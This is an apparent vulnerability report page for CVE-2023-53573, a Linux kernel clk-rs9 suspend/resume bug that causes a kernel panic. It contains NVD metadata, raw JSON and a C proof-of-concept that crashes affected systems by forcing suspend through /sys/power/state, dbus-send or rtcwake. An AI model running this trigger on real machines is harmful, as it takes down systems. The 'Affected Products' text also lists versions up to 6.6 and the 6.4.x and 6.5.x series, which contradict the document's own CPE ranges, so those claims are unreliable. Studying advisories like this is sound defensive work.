Security Vulnerability Report
CVE-2023-53573 CVSS 5.5 MEDIUM

CVE-2023-53573

Published: 2025-10-04 16:15:53
Last Modified: 2026-03-21 01:07:42
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

clk: rs9: Fix suspend/resume

Disabling the cache in commit 2ff4ba9e3702 ("clk: rs9: Fix I2C accessors") without removing cache synchronization in resume path results in a kernel panic as map->cache_ops is unset, due to REGCACHE_NONE. Enable flat cache again to support resume again. num_reg_defaults_raw is necessary to read the cache defaults from hardware. Some registers are strapped in hardware and cannot be provided in software.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions >= 6.0.8 and < 6.1) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions >= 6.1.1 and < 6.1.25) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions >= 6.2 and < 6.2.12) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc4:*:*:*:*:*:* - VULNERABLE
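Linux Kernel < 6.6 (versions that include the clk-rs9 driver and are affected by commit 2ff4ba9e3702)
Affected stable versions include those in the 6.1.x, 6.4.x and 6.5.x series that have not applied the fix patch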

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53573 PoC - Trigger kernel panic via suspend/resume
// This vulnerability is triggered when the system resumes from suspend
// because the clk-rs9 driver's resume path attempts cache synchronization
// while the cache has been disabled (REGCACHE_NONE), causing a NULL pointer
// dereference on map->cache_ops.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>

// Method 1: Use systemd suspend via D-Bus
int trigger_suspend_via_dbus(void)
{
    // Requires the rs9 clock chip to be present on the system
    // (e.g., in embedded/industrial hardware using a Renesas 9-series
    // PCIe clock generator)
    int ret = system("dbus-send --system --print-reply "
                     "--dest=org.freedesktop.login1 "
                     "/org/freedesktop/login1 "
                     "org.freedesktop.login1.Manager.Suspend boolean:true");
    return ret;
}

// Method 2: Write to /sys/power/state to trigger suspend
int trigger_suspend_via_sysfs(void)
{
    int fd;

    fd = open("/sys/power/state", O_WRONLY);
    if (fd < 0) {
        perror("open /sys/power/state");
        return -1;
    }

    // Writing "mem" triggers suspend-to-RAM
    // On resume, the rs9 driver's resume callback will attempt
    // regcache_sync() with cache_ops == NULL, causing kernel panic
    if (write(fd, "mem", 3) < 0) {
        perror("write to /sys/power/state");
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}

// Method 3: Use rtcwake to automatically wake and trigger the bug
int trigger_suspend_with_rtcwake(void)
{
    // Suspend for 5 seconds, then resume
    // The resume path will trigger the vulnerability
    int ret = system("rtcwake -m mem -s 5");
    return ret;
}

int main(int argc, char *argv[])
{
    printf("CVE-2023-53573 - Linux kernel clk:rs9 suspend/resume PoC\n");
    printf("WARNING: This will crash the system if the rs9 driver is loaded!\n");

    if (argc > 1 && strcmp(argv[1], "--confirm") == 0) {
        // Trigger suspend to demonstrate the vulnerability;
        // report failure to the caller if the suspend request was rejected
        if (trigger_suspend_via_sysfs() != 0)
            return 1;
    } else {
        printf("Usage: %s --confirm\n", argv[0]);
        printf("This PoC triggers a kernel panic by suspending the system.\n");
        printf("On resume, the clk-rs9 driver's resume callback attempts\n");
        printf("regcache_sync() with map->cache_ops == NULL (REGCACHE_NONE),\n");
        printf("causing a NULL pointer dereference and kernel panic.\n");
    }

    return 0;
}

// Kernel-side trigger conditions:
// - The rs9 clock driver must be loaded (CONFIG_COMMON_CLK_RS9_PCIE)
// - The system must support suspend/resume
// - The rs9 chip must be present on the I2C bus
//
// The fix (commit 632e04739c8f) re-enables flat cache (REGCACHE_FLAT)
// and adds num_reg_defaults_raw to read defaults from hardware.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53573", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.917", "lastModified": "2026-03-21T01:07:42.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: rs9: Fix suspend/resume\n\nDisabling the cache in commit 2ff4ba9e3702 (\"clk: rs9: Fix I2C accessors\")\nwithout removing cache synchronization in resume path results in a\nkernel panic as map->cache_ops is unset, due to REGCACHE_NONE.\nEnable flat cache again to support resume again. num_reg_defaults_raw\nis necessary to read the cache defaults from hardware. Some registers\nare strapped in hardware and cannot be provided in software."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.8", "versionEndExcluding": "6.1", "matchCriteriaId": "C49BA079-1891-4A21-B1A5-DB8C45CD20B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.1", "versionEndExcluding": "6.1.25", "matchCriteriaId": "BABF4313-DC0E-452A-9129-0C09389863AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": 
"6.2", "versionEndExcluding": "6.2.12", "matchCriteriaId": "4AA01E0B-227C-4686-AC91-BA30BCC48E6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:-:*:*:*:*:*:*", "matchCriteriaId": "DE093B34-F4CD-4052-8122-730D6537A91A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc4:*:*:*:*:*:*", "matchCriteriaId": "1C6E00FE-5FB9-4D20-A1A1-5A32128F9B76"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc5:*:*:*:*:*:*", "matchCriteriaId": "35B26BE4-43A6-4A36-A7F6-5B3F572D9186"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc6:*:*:*:*:*:*", "matchCriteriaId": "3FFFB0B3-930D-408A-91E2-BAE0C2715D80"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc7:*:*:*:*:*:*", "matchCriteriaId": "8535320E-A0DB-4277-800E-D0CE5BBA59E8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc8:*:*:*:*:*:*", "matchCriteriaId": "21718AA4-4056-40F2-968E-BDAA465A7872"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc1:*:*:*:*:*:*", "matchCriteriaId": "B8E3B0E8-FA27-4305-87BB-AF6C25B160CB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc2:*:*:*:*:*:*", "matchCriteriaId": "A47F0FC3-CE52-4BA1-BA51-22F783938431"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc3:*:*:*:*:*:*", "matchCriteriaId": "3583026A-27EC-4A4C-850A-83F2AF970673"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc4:*:*:*:*:*:*", "matchCriteriaId": "DC271202-7570-4505-89A4-D602D47BFD00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc5:*:*:*:*:*:*", "matchCriteriaId": "D413BB6D-4F74-4C7D-9163-47786619EF53"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.3:rc6:*:*:*:*:*:*", "matchCriteriaId": "F4D613FB-9976-4989-8C4A-567773373CEA"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/632e04739c8f45c2d9ca4d4c5bd18d80c2ac9296", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": 
["Patch"]}, {"url": "https://git.kernel.org/stable/c/74f4471ad64214dd5046213ebdd6e0930da7bd2c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a983967602675880d6160a17ace2c0f48717ff33", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}